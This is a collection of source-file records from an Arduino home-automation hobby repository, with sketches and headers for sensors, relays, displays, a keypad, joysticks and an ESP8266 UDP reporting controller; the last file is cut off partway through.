"text": "# Control 3-Pin (RBG) LED lights\n \nDesign Goals: This library is designed to be... \n \n* Easy control of RBG LED lights\n* Support many flashing patterns (only one is implemented now...)\n \nSupported Boards: \n \n* Uno\n\n## Pin layout\n\nThe table below shows how to connect the the pins of the RBG LED light\nto Arduino UNO board.\nR, B, and G pins are configurable.\n\n| PIN | RBG LED | Arduino UNO | ATtiny25/45/85 [0] | ATtiny44/84 [1] |\n|-----|----------|-------------|--------------------|-----------------|\n| 1 | V | GND | | |\n| 2 | R | 8 | | |\n| 3 | B | 9 | | |\n| 4 | G | 10 | | |\n\n\n**Constructor:**\n\n RbgLight(unsigned int _r_pin, unsigned int _b_pin,\n unsigned int _g_pin, bool _light_on_lvl);\n _r_pin: which pin is connected to R;\n _b_pin: which pin is connected to B;\n _g_pin: which pin is connected to G;\n _light_on_lvl: activation level (usually HIGH activate light)."
},
{
"alpha_fraction": 0.4909280240535736,
"alphanum_fraction": 0.5178465247154236,
"avg_line_length": 32.28712844848633,
"blob_id": "2fa87db73de81bdb8b74c869fe7214c71ab1ec5f",
"content_id": "a8fbcf558dbb1a6e6bcf0a95a84dd876366f67a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6724,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 202,
"path": "/ArduinoController/ArduinoController.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n One Arduino with support of:\n 1. one relay;\n 2. one temperature sensor;\n http://bildr.org/2011/07/ds18b20-arduino/\n http://www.hobbytronics.co.uk/ds18b20-arduino\n http://www.pjrc.com/teensy/td_libs_OneWire.html\n https://github.com/milesburton/Arduino-Temperature-Control-Library\n http://www.milesburton.com/?title=Dallas_Temperature_Control_Library\n http://datasheets.maximintegrated.com/en/ds/DS18B20.pdf\n 3. one light sensor;\n 4. one infrared detector;\n 5. one ESP8266 (Serial over Wifi);\n\n Connection:\n 1 relay\n VCC ->\n GND -> GND\n IN -> PIN_3\n 2 DS18B20\n GND -> GND\n VDD -> 5V\n DAT -> 4.7 kOhm -> 5V\n DAT -> PIN_4\n 3 light sensor\n VCC -> 5V\n GND -> GND\n DO -> PIN_5\n 4 Infrared sensor\n VCC -> 5V\n GND -> GND\n OUT -> PIN_6\n\n 5 ESP8266\n If you hold ESP8266 with antenna end upwards and all chips facing you, then from upper left corner to upper right corner, then\n from lower left corner to lower right corner, you have pins:\n GND, GPIO2, GPIO0, URXD\n UTXD, CH_PD, RST, VCC\n connection:\n GND -> GND\n URXD -> TXD 1\n UTXD -> RXD 0\n CH_PD -> 3.3V\n VCC -> 3.3V\n connection for debugging:\n URXD -> PIN_11\n UTXD -> PIN_10\n\n Overall description:\n 1. Use ESP8266 to connect to wifi;\n 2. Send periodically report using ASCII and UDP datagram to predefined IP address and port;\n 3. For each UDP report sent, one command datagram can be received and executed;\n\n Binary sketch size: 16278 Bytes (if all chips are used)\n Binary sketch size limit:\n Arduino Uno: 32256 Bytes\n Arduino Nano w/ ATmega328: 30720 Bytes\n*/\n\n/**** Debug Settings *********************************************************/\n/**** End of Debug Settings **************************************************/\n\n/**** Chip Usage **************************************************************\n Comment out the define if the chip is not used.\n*/\n#define USE_RELAY\n#define USE_TEMPERATURE_SENSOR\n//#define USE_LIGHT_SENSOR\n//#define USE_INFRARED_SENSOR\n// ESP8266 is always used\n/**** End of Chip Usage ******************************************************/\n\n/**** Chip Connection *********************************************************\n Change port connection if otherwise\n*/\n#ifdef USE_RELAY\n #include \"Relay.h\"\n #define RELAY_IN_PORT 3\n #define RELAY_OFF HIGH\n Relay relay(RELAY_IN_PORT, RELAY_OFF);\n#endif\n\n#ifdef USE_TEMPERATURE_SENSOR\n #include <OneWire.h>\n #include \"TemperatureSensor.h\"\n #define DS18B20_PIN 4\n OneWire ds18b20(DS18B20_PIN);\n#endif\n\n#ifdef USE_LIGHT_SENSOR\n #include \"LightSensor.h\"\n #define LIGHTSENSOR_PORT 5\n LightSensor lightSensor(LIGHTSENSOR_PORT);\n#endif\n\n#ifdef USE_INFRARED_SENSOR\n #include \"InfraredSensor.h\"\n #define INFRAREDSENSOR_PORT 6\n InfraredSensor infraredSensor(INFRAREDSENSOR_PORT);\n#endif\n/**** End of Chip Connection *************************************************/\n\n/**** ESP8266 Configurations *************************************************/\n#include \"uartWIFI.h\"\n#ifdef ESP8266_DEBUG\n #include <SoftwareSerial.h>\n#endif\n#include \"Cmd.h\"\n#define SSID \"michael\"\n#define PASSWORD \"waterpigs\"\n#define SERVER_IP \"192.168.31.107\" //RaspberryPi\n#define SERVER_PORT 9999\n// Reporting configuration\n#define REPORT_INTERVAL 10 // in seconds, between two reports\n#define ARDUINO_ID \"FrontDoorStep\" // ID\nWIFI wifi; // ESP8266 serial over Wifi\nchar wifiBuffer[128]; // buffer for receiving data\n/**** End of ESP8266 Configurations ******************************************/\n\n/**** Defines 
****************************************************************/\n/**** End of Defines *********************************************************/\n\n/**** Global Variables *******************************************************/\nunsigned long last_report_time;\n/**** End of Global Variables ************************************************/\n\n// the setup function runs once when you press reset or power the board\nvoid setup() {\n #ifdef USE_RELAY\n relay.begin(RELAY_OFF);\n #endif\n //lightSensor.begin();\n //infraredSensor.begin();\n\n last_report_time = 0;\n\n // initialize ESP8266\n wifi.begin();\n wifi.Initialize(STA, SSID, PASSWORD);\n delay(8000); //make sure the module have enough time to get an IP address\n wifi.ipConfig(UDP, SERVER_IP, SERVER_PORT); // configure server info\n}\n\n// the loop function runs over and over again forever\nvoid loop() {\n // we send a report every 60 seconds\n unsigned long cur_time = millis();\n bool do_report = false;\n if (cur_time < last_report_time)\n {\n // time counter has wrapped around.\n do_report = true;\n }\n else if (cur_time - last_report_time >= REPORT_INTERVAL*1000)\n {\n do_report = true;\n }\n\n if (do_report)\n {\n last_report_time = cur_time;\n String report = String(\"REPORT;\"); // + String(ARDUINO_ID) + \";\";\n report += ARDUINO_ID;\n report += \";\";\n // relay status\n #ifdef USE_RELAY\n report += \"Relay;\";\n report += String(int(100 * relay.cur_lvl()));\n report += \";\";\n #endif\n // temperature sensor\n #ifdef USE_TEMPERATURE_SENSOR\n report += \"Temperature;\";\n report += String(int(100 * get_temperature(&ds18b20)));\n report += \";\";\n #endif\n // light sensor\n #ifdef USE_LIGHT_SENSOR\n report += \"Light;\";\n report += String(int(100 * lightSensor.get()));\n report += \";\";\n #endif\n // infra-red sensor\n #ifdef USE_INFRARED_SENSOR\n report += String(\"Infrared;\");\n report += String(int(100 * infraredSensor.get()));\n report += \";\";\n #endif\n wifi.Send(report);\n\n // receive response (cmd) from server\n int data_len = wifi.ReceiveMessage(wifiBuffer);\n if (data_len >= 4) { // minimum length of CMD datagram, i.e. \"CMD;\"\n String datagram = String(wifiBuffer);\n if (datagram.startsWith(\"CMD;\", 0)) {\n // this is a valid CMD datagram\n datagram = datagram.substring(4);\n Cmd(datagram).execute();\n }\n }\n }\n}\n"
},
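The sketch above emits `REPORT;<ARDUINO_ID>;<sensor>;<value*100>;…` UDP datagrams to `SERVER_IP:SERVER_PORT` and accepts at most one `CMD;…` datagram in reply. A minimal sketch of what the receiving side (the Raspberry Pi named in the sketch's comments) could look like, using plain Python sockets; the datagram layout follows the Arduino code, while the `relay_on` reply string is a hypothetical command, not something the repo defines:

```python
import socket

SERVER_PORT = 9999  # matches SERVER_PORT in the sketch above

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("", SERVER_PORT))

while True:
    data, addr = sock.recvfrom(1024)
    fields = data.decode("ascii", errors="replace").split(";")
    if fields[0] != "REPORT":
        continue
    arduino_id, payload = fields[1], fields[2:]
    # Readings are sent as int(100 * value), so scale them back down.
    readings = {k: int(v) / 100.0 for k, v in zip(payload[::2], payload[1::2]) if v}
    print(arduino_id, readings)
    # One command datagram may be sent back per report, e.g.:
    # sock.sendto(b"CMD;relay_on", addr)  # hypothetical command string
```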
{
"alpha_fraction": 0.49275875091552734,
"alphanum_fraction": 0.537265956401825,
"avg_line_length": 25.448598861694336,
"blob_id": "9ba9dca6386ff8dfd69c71daf6b990205e12e2a9",
"content_id": "520338f30f9df75099c28a3b7cb5c5ae30e0a7e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2831,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 107,
"path": "/LcdDisplay/LcdDisplay.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/* Connections:\n 20-char 4-line LCD display QC2004A:\n PIN_1 to PIN_16 <-> I2C adapter PIN_1 to PIN_16\n I2C adapter: hole it with all chips facing you, and 16 pins on the top, then these pins\n from left to right are PIN_16 to PIN_1\n GND <-> GND\n VCC <-> 5V\n SDA <-> A4 (on Mini); SDA <-> 1kOhm <-> 5V\n SCL <-> A5 (on Mini); SCL <-> 1kOhm <-> 5V\n its I2C addr: 0x27\n Clock chip SZ-042:\n GND <-> GND\n VCC <-> 5V\n SDA <-> A4 (on Mini); SDA <-> 1kOhm <-> 5V\n SCL <-> A5 (on Mini); SCL <-> 1kOhm <-> 5V\n its I2C addr: 0x68\n DS18B20 temperature sensor:\n GND <-> GND;\n VCC <-> 5V;\n DAT <-> D4 (on Mini); DAT <-> 1kOhm <-> 5V\n PIR sensor:\n GND <-> GND\n VCC <-> 5V\n OUT <-> D2 (on Mini)\n*/\n\n\n#include <Wire.h> \n#include \"LiquidCrystal_I2C.h\"\n#include \"DS3231.h\"\n#include \"TemperatureSensor.h\"\n\n//#define ENABLE_DEBUG\n\n// Set the LCD address to 0x27 for a 16 chars and 2 line display\nLiquidCrystal_I2C lcd(0x27, 20, 4);\n\nDS3231 clock(0x68);\nboolean set_time = false;\n\nOneWire ds(4); // temperature sensor\n\nconst int PIR_PIN = 2;\nconst byte ON_PERIOD = 20; // 60 * 1024 milliseconds\nvolatile byte onTime;\n\nvoid motion() {\n onTime = ON_PERIOD;\n}\n\nvoid setup()\n{\n // initialize the LCD\n lcd.begin();\n \n clock.begin();\n \n #ifdef ENABLE_DEBUG\n Serial.begin(19200);\n #endif\n\n // Turn on the blacklight and print a message.\n lcd.backlight();\n if (set_time) {\n clock.setTime(0, 43, 19, 6, 31, 7, 15);\n }\n \n onTime = ON_PERIOD;\n //pinMode(2, INPUT);\n attachInterrupt(0, motion, CHANGE);\n}\n\nvoid loop()\n{\n unsigned long start_time = millis();\n byte consumedSec = 0;\n if (onTime !=0 ) {\n lcd.backlight();\n } else {\n lcd.noBacklight();\n }\n String curTime = clock.readTime();\n #ifdef ENABLE_DEBUG\n Serial.println(curTime);\n Serial.print(\"onTime=\"); Serial.println(onTime);\n #endif\n lcd.setCursor(0, 0); // column, row\n lcd.print(curTime);\n \n float temperature = get_temperature(&ds);\n #ifdef ENABLE_DEBUG\n Serial.print(\"Temperature: \"); Serial.println(temperature);\n #endif\n lcd.setCursor(0, 1);\n lcd.print(\"Temp: \"); lcd.setCursor(6, 1);\n lcd.print(temperature); lcd.setCursor(11, 1);\n lcd.print(\" Celsius\");\n //String temperature = String(\"Temp: \") + temperature + \" Celsius\";\n //lcd.print(String(\"Temp: \") + temperature + \" Celsius\");\n delay(1000);\n consumedSec = (millis() - start_time) >> 10;\n if (consumedSec < onTime) {\n onTime -= consumedSec;\n } else {\n onTime = 0;\n }\n}\n\n"
},
{
"alpha_fraction": 0.6765799522399902,
"alphanum_fraction": 0.6877323389053345,
"avg_line_length": 18.214284896850586,
"blob_id": "6d9a66237f858e0d14acdde8222339d9aad44096",
"content_id": "0aab090d2e0b81fe9dfdb3e3e42564f0b56f6a54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 14,
"path": "/elSkateboard/CurrentSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __CURRENT_SENSOR_CPP__\n#define __CURRENT_SENSOR_CPP__\n\n#include \"CurrentSensor.h\"\n\nCurrentSensor::CurrentSensor(int _pin):\n pin(_pin){\n}\n\nfloat CurrentSensor::read() {\n return (analogRead(pin) - 512) * CURRENT_RESOLUTION;\n}\n\n#endif // __CURRENT_SENSOR_CPP__\n"
},
{
"alpha_fraction": 0.747922420501709,
"alphanum_fraction": 0.8005540370941162,
"avg_line_length": 29,
"blob_id": "8415047787e34756d275eb98881b20be10f19c70",
"content_id": "b3e190a1bcb0eb41eef45376e1b34f4ef0ac482c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 361,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 12,
"path": "/MowerRobot/UltraSonicSensorProxy/constants.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n#ifndef __ULTRASONICSENSORPROXY_H__\n#define __ULTRASONICSENSORPROXY_H__\n\nconst uint8_t UltraSonicSensorProxyAddress = 0x10;\nconst uint8_t UltraSonicSensorNumber = 0x6;\nconst unsigned long UltraSonicSensorTimeOut = 300 * 2 * 29;\n\n\nconst uint8_t UltraSonicSensorProxyCmdSetThreshold = 0x0;\nconst uint8_t UltraSonicSensorProxyCmdRequestDistance = 0x1;\n\n#endif\n"
},
{
"alpha_fraction": 0.6113927960395813,
"alphanum_fraction": 0.6606024503707886,
"avg_line_length": 35.05376434326172,
"blob_id": "cc4cd752c6db338d7c651608abb49f9ae31f87fd",
"content_id": "ae58631552f03275bb2bcda3f7456129b2009610",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3353,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 93,
"path": "/MiniTempSensor/FourDigitDisplay.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n4-digit 7-segment display model: F2481AH\nHold the display panel towards you, and all the decimal points at the downside, then\nthe pins from down-left to down-right, and then top-right to top-left are:\n PIN_1 to PIN_7, PIN_8 to PIN_14\n\nBasics:\n 1. one digit is composed of 7 segments\n 2. one digit is selected if its pin is LOW\n 3. one segment of the selected digit is selected if its pin is HIGH\n\nSelections:\n digit_1 <- PIN_12\n digit_2 <- PIN_1\n digit_3 <- PIN_5\n digit_4 <- PIN_9\n segment_A <- PIN_14\n segment_B <- PIN_8\n segment_C <- PIN_6\n segment_D <- PIN_2,7\n segment_E <- PIN_4\n segment_F <- PIN_13\n segment_G <- PIN_10\n decimal_point <- PIN_3\n colon <- PIN_11 // not used in this lib\n\n A\n __\n F|__| B the middle one is G\n E|__| C\n D\n\nConnect all pins to digital pins on Arduino, if analog pin is used, in constructor\nuse analog pin number + 100. E.g. if digit_1 pin is connected to PIN_A1 on\nArduino, then when calling the constructor give the pin number as 101.\nNote that this is only valid for the four digit selection pins.\n*/\n\n#ifndef __FOURDIGITDISPLAY_H__\n#define __FOURDIGITDISPLAY_H__\n\n#include <Arduino.h>\n\n// display patterns for digits 0 to 9, here 1 means light up. so in program they\n// need to be binary negated\n// bit 0 is segment_A, bit 6 is segment_G\nconst byte DISPLAY_PATTERN_ZERO = B00111111;\nconst byte DISPLAY_PATTERN_ONE = B00000110;\nconst byte DISPLAY_PATTERN_TWO = B01011011;\nconst byte DISPLAY_PATTERN_THREE = B01001111;\nconst byte DISPLAY_PATTERN_FOUR = B01100110;\nconst byte DISPLAY_PATTERN_FIVE = B01101101;\nconst byte DISPLAY_PATTERN_SIX = B01111101;\nconst byte DISPLAY_PATTERN_SEVEN = B00000111;\nconst byte DISPLAY_PATTERN_EIGHT = B01111111;\nconst byte DISPLAY_PATTERN_NINE = B01101111;\nconst byte DISPLAY_PATTERN_MINUS = B01000000; // the minus sign\nconst byte DISPLAY_PATTERN_OUT_OF_RANGE = B11111111;\nconst byte DISPLAY_PATTERNS[12] = {DISPLAY_PATTERN_ZERO, DISPLAY_PATTERN_ONE,\n DISPLAY_PATTERN_TWO, DISPLAY_PATTERN_THREE, DISPLAY_PATTERN_FOUR,\n DISPLAY_PATTERN_FIVE, DISPLAY_PATTERN_SIX, DISPLAY_PATTERN_SEVEN,\n DISPLAY_PATTERN_EIGHT, DISPLAY_PATTERN_NINE, DISPLAY_PATTERN_MINUS };\n\nclass FourDigitDisplay\n{\nprivate:\n int min_value, max_value; // minimum and maximum value can be displayed\n int d1, d2, d3, d4; // digit selection pins\n int d_pins[4];\n int sA, sB, sC, sD, sE, sF, sG; // segment selection pins\n int s_pins[7];\n int dp; // decimal point selection pin\n byte d_values[4] = {255};\n byte f_values[4] = {0};\n\npublic:\n FourDigitDisplay( int _d1, int _d2, int _d3, int _d4,\n int _sA, int _sB, int _sC, int _sD, int _sE, int _sF, int _sG,\n int _dp);\n void init(void);\n void clear(void);\n void select_digit(byte nr); // select one digit\n void digit(byte d, boolean use_dp); // display one digit\n void _prepare(int value);\n void _prepare(double value);\n void _display(boolean only_int);\n void display(int value);\n void display(int value, unsigned long ms); // display given value for ms milliseconds.\n void display(double value);\n void display(double value, unsigned long ms);\n};\n\n#endif // __FOURDIGITDISPLAY_H__\n"
},
{
"alpha_fraction": 0.5525222420692444,
"alphanum_fraction": 0.6017804145812988,
"avg_line_length": 25.28125,
"blob_id": "f01f529fac971e66a3512c8f0f4deae3eb0fe4cc",
"content_id": "bc6c28dea3d18b500c0233f6710b79c270c02ea2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1685,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 64,
"path": "/Keypad/Keypad.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n\nconst byte numRows= 4; //number of rows on the keypad\nconst byte numCols= 4; //number of columns on the keypad\n\n//keymap defines the key pressed according to the row and columns just as appears on the keypad\nchar keymap[numRows][numCols]= \n{\n {'1', '2', '3', 'A'}, \n {'4', '5', '6', 'B'}, \n {'7', '8', '9', 'C'},\n {'*', '0', '#', 'D'}\n};\n\n/*\n if you hold the keypad with buttons facing you and the cables dropping down, then\n the cables from left to right are:\n rows 0 to 3, and then columns 0 to 3\n*/\n\n//Code that shows the the keypad connections to the arduino terminals\nbyte rowPins[numRows] = {8,7,6,5}; //Rows 0 to 3\nbyte colPins[numCols] = {12,11,10,9}; //Columns 0 to 3\n\n\nvoid setup()\n{\n Serial.begin(9600);\n}\n\n//If key is pressed, this key is stored in 'keypressed' variable\n//If key is not equal to 'NO_KEY', then this key is printed out\n//if count=17, then count is reset back to 0 (this means no key is pressed during the whole keypad scan process\nconst int dpins[8] = {5,6,7,8,9,10,11,12};\nconst int apins[8] = {26,25,24,23,22,21,20,19};\nint avalues[8] = {0};\nint dvalues[8] = {0};\n\nvoid loop()\n{\n boolean apressed = false;\n boolean dpressed = false;\n for (int i=0; i<8; i++) {\n avalues[i] = analogRead(apins[i]);\n delay(50);\n dvalues[i] = digitalRead(dpins[i]);\n if (avalues[i] > 500) {\n apressed = true;\n }\n if (dvalues[i] == 1) {\n dpressed = true;\n }\n }\n if (apressed) {\n for (int i=0; i<8; i++) {\n Serial.print(avalues[i]); Serial.print(\",\");\n }\n Serial.println(\"\");\n }\n if (dpressed) {\n for (int i=0; i<8; i++) {\n Serial.print(dvalues[i]); Serial.print(\",\");\n }\n Serial.println(\"\");\n }\n}\n\n"
},
{
"alpha_fraction": 0.613081157207489,
"alphanum_fraction": 0.6390858888626099,
"avg_line_length": 17.39130401611328,
"blob_id": "64c3b2471b79b5302bfad70f74d5a6bc59bc7155",
"content_id": "62cece067cb536e3f809857694bbb33e22114ad8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1269,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 69,
"path": "/WifiCar/protocol.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n\n#ifndef __PROTOCOL_H__\n#define __PROTOCOL_H__\n\n#include <Arduino.h>\n\nconst char SEPARATOR = ':';\nconst char END_MARK = ';';\n\nconst String TYPE_COMMAND = \"CMD\";\nconst String TYPE_RESPONSE = \"RSP\";\n\n// op codes for commands\nconst int OP_CODE_UNKNOWN = 0x00;\nconst int OP_CODE_TEMPERATURE = 0x01;\nconst int OP_CODE_ECHO = 0x02;\nconst int OP_CODE_MOTOR_FORWARD = 0x03;\nconst int OP_CODE_MOTOR_BACKWARD = 0x04;\nconst int OP_CODE_MOTOR_STOP = 0x05;\nconst int OP_CODE_MOTOR_SPEEDUP = 0x06;\nconst int OP_CODE_MOTOR_SPEEDDOWN = 0x07;\nconst int OP_CODE_MOTOR_TURNLEFT = 0x08;\nconst int OP_CODE_MOTOR_TURNRIGHT = 0x09;\n\n// status for responses\nconst int STATUS_OK = 0xfe;\nconst int STATUS_NOK = 0xfd;\nconst int STATUS_UNSUPPORTED = 0xfc;\n\nvoid send(String a_str);\n\nclass Command\n{\nprivate:\n String _str;\n\npublic:\n int op_code;\n boolean is_ok;\n String op_str;\n String error;\n Command(String _str = \"\");\n String echo(void);\n};\n\nclass Response\n{\nprivate:\n String msg;\n int status;\n\npublic:\n Response(int _status, String _msg);\n String to_s(void);\n};\n\nclass DebugMsg\n{\nprivate:\n String _str;\n\npublic:\n DebugMsg(String _str);\n String to_s(void);\n};\n\n#endif // __PROTOCOL_H__\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.625,
"avg_line_length": 19,
"blob_id": "d750a96b3bb7fe95a80fa2b46fc56939af842868",
"content_id": "23cac8b6bd000509ada35848f7d8f3a38dfb8dea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 12,
"path": "/WifiCar/echoSerial/echoSerial.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#define SERIAL_BAUDRATE 19200\n\nvoid setup(){\n Serial.begin(SERIAL_BAUDRATE);\n}\n\nvoid loop(){\n if (Serial.available()) {\n String s = Serial.readStringUntil(0); // read until new line character\n Serial.print(s);\n }\n}\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.625,
"avg_line_length": 13.5,
"blob_id": "f2bd107f719e9b40be87861be8901b3f7f747f96",
"content_id": "82b6d1f0b8452e4f3c70dde47e04f6bf6b0cadcc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 232,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 16,
"path": "/WifiCar/debug.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Define debug macros.\n*/\n\n#ifndef __DEBUG_H__\n#define __DEBUG_H__\n\n#include <Arduino.h>\n\n#ifdef ENABLE_DEBUG\n #define dbg_print(a_str) Serial.println(a_str)\n#else\n #define dbg_print(a_str)\n#endif\n\n#endif // __DEBUG_H__\n"
},
{
"alpha_fraction": 0.6014760136604309,
"alphanum_fraction": 0.6383763551712036,
"avg_line_length": 15.9375,
"blob_id": "2aa4bf775decd7a2281b9d5b7170fab225e6b0c4",
"content_id": "ed6e799e45b23fab4e2284d39648200ad208dddf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 16,
"path": "/elSkateboard/CurrentSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __CURRENT_SENSOR_H__\n#define __CURRENT_SENSOR_H__\n\n#include <Arduino.h>\n#define CURRENT_RESOLUTION 0.0391 // = 20A / 512\n\nclass CurrentSensor\n{\n private:\n int pin;\n\n public:\n CurrentSensor(int _pin);\n float read();\n};\n#endif // __CURRENT_SENSOR_H__\n"
},
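The `CURRENT_RESOLUTION` constant in the header above encodes the sensor's scale: per its own comment, a ±20 A range mapped onto a 10-bit ADC centred at count 512 gives 20 / 512 A per count. A quick illustrative check of that arithmetic and of the `(analogRead(pin) - 512) * CURRENT_RESOLUTION` conversion used in `CurrentSensor::read()` (the ±20 A range is inferred from the "20A / 512" comment, not stated elsewhere):

```python
CURRENT_RESOLUTION = 20.0 / 512  # ~0.0390625, rounded to 0.0391 in the header

def counts_to_amps(raw):
    """Mirror CurrentSensor::read(): offset-centred ADC counts to amperes."""
    return (raw - 512) * CURRENT_RESOLUTION

print(counts_to_amps(512))   # 0.0 A at the zero-current midpoint
print(counts_to_amps(1023))  # ~19.96 A near positive full scale
print(counts_to_amps(0))     # -20.0 A at negative full scale
```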
{
"alpha_fraction": 0.6394187211990356,
"alphanum_fraction": 0.6448683142662048,
"avg_line_length": 19.79245376586914,
"blob_id": "9dcfde01e0ddbaf609b7edc65e3791eb0c8b0b55",
"content_id": "c855a081733668db8b5537fc44b8ac1b725ac9c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1101,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 53,
"path": "/ArduinoController/bitlashRelay.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Provide bitlash wrap-up of a Relay instance.\n Relay instance has to be:\n 1. named \"relay\";\n 2. exist as global variale\n*/\n\nnumvar relay_on(void)\n{\n relay.on();\n return relay.cur_lvl();\n}\n\nnumvar relay_off(void)\n{\n relay.off();\n return relay.cur_lvl();\n}\n\nnumvar relay_cur_lvl(void)\n{\n return relay.cur_lvl();\n}\n\nnumvar relay_set_on_lvl(void)\n{\n if (getarg(0) == 1)\n {\n relay.on_lvl(getarg(1));\n return relay.cur_lvl();\n }\n return -1;\n}\n\nnumvar relay_get_on_lvl(void)\n{\n return relay.on_lvl();\n}\n\nnumvar relay_get_pin(void)\n{\n return relay.pin();\n}\n\nvoid register_bitlash_relay(void)\n{\n addBitlashFunction(\"relay_on\", (bitlash_function) relay_on);\n addBitlashFunction(\"relay_off\", (bitlash_function) relay_off);\n addBitlashFunction(\"relay_cur_lvl\", (bitlash_function) relay_cur_lvl);\n addBitlashFunction(\"relay_set_on_lvl\", (bitlash_function) relay_set_on_lvl);\n addBitlashFunction(\"relay_get_on_lvl\", (bitlash_function) relay_get_on_lvl);\n addBitlashFunction(\"relay_get_pin\", (bitlash_function) relay_get_pin);\n}"
},
{
"alpha_fraction": 0.5732700228691101,
"alphanum_fraction": 0.5909090638160706,
"avg_line_length": 25.799999237060547,
"blob_id": "a6d082457609b8d1d6a0e480a118681636e4ff02",
"content_id": "07bc37943bc5ef79230804bdb20108bfbb2dc3c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2948,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 110,
"path": "/WifiCar/RemoteController/RemoteController.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#include <Arduino.h>\n\n/* Left joy stick\n VCC <-> 5V, GND <-> GND\n VRx <-> PIN_A0\n VRy <-> PIN_A1\n SW <-> PIN_D2\n Right joy stick\n VCC <-> 5V, GND <-> GND\n VRx\t<-> PIN_A2\n VRy <-> PIN_A3\n SW <-> PIN_D3\n*/\n\nconst byte JOYSTICK_NONE = 0x00;\nconst byte JOYSTICK_LEFT = 0x01;\nconst byte JOYSTICK_RIGHT = 0x02;\nconst byte JOYSTICK_UP = 0x04;\nconst byte JOYSTICK_DOWN = 0x08;\nconst byte JOYSTICK_CLICK = 0x10;\n\nconst int LEFT_JOYSTICK_VRX_PIN = 0;\nconst int LEFT_JOYSTICK_VRY_PIN = 1;\nconst int LEFT_JOYSTICK_SW_PIN = 2;\nconst int RIGHT_JOYSTICK_VRX_PIN = 2;\nconst int RIGHT_JOYSTICK_VRY_PIN = 3;\nconst int RIGHT_JOYSTICK_SW_PIN = 3;\n\nconst int JOYSTICK_MIN = 0;\nconst int JOYSTICK_MAX = 1023;\nconst int JOYSTICK_MARGIN = 100;\n\nbyte joystick_left_init(int sw_pin = LEFT_JOYSTICK_SW_PIN)\n{\n pinMode(sw_pin, INPUT_PULLUP);\n}\n\nbyte joystick_right_init(int sw_pin = RIGHT_JOYSTICK_SW_PIN)\n{\n pinMode(sw_pin, INPUT_PULLUP);\n}\n\nbyte joystick_left(int vrx_pin = LEFT_JOYSTICK_VRX_PIN,\n int vry_pin = LEFT_JOYSTICK_VRY_PIN,\n int sw_pin = LEFT_JOYSTICK_SW_PIN)\n{\n int x, y, sw = 0;\n byte status = JOYSTICK_NONE;\n x = analogRead(vrx_pin);\n y = analogRead(vry_pin);\n sw = digitalRead(sw_pin);\n //Serial.print(String(\"left x=\") + x + \"\\ty=\" + y + \"\\tsw=\" + sw);\n if (x < JOYSTICK_MIN + JOYSTICK_MARGIN) {\n status |= JOYSTICK_DOWN;\n } else if (x > JOYSTICK_MAX - JOYSTICK_MARGIN) {\n status |= JOYSTICK_UP;\n }\n if (y < JOYSTICK_MIN + JOYSTICK_MARGIN) {\n status |= JOYSTICK_RIGHT;\n } else if (y > JOYSTICK_MAX - JOYSTICK_MARGIN) {\n status |= JOYSTICK_LEFT;\n }\n if (sw == 0) {\n status |= JOYSTICK_CLICK;\n }\n //Serial.println(String(\"\\tstatus=\") + status);\n return status;\n}\n\nbyte joystick_right(int vrx_pin = RIGHT_JOYSTICK_VRX_PIN,\n int vry_pin = RIGHT_JOYSTICK_VRY_PIN,\n int sw_pin = RIGHT_JOYSTICK_SW_PIN)\n{\n int x, y, sw = 0;\n byte status = JOYSTICK_NONE;\n x = analogRead(vrx_pin);\n y = analogRead(vry_pin);\n sw = digitalRead(sw_pin);\n //Serial.print(String(\"right x=\") + x + \"\\ty=\" + y + 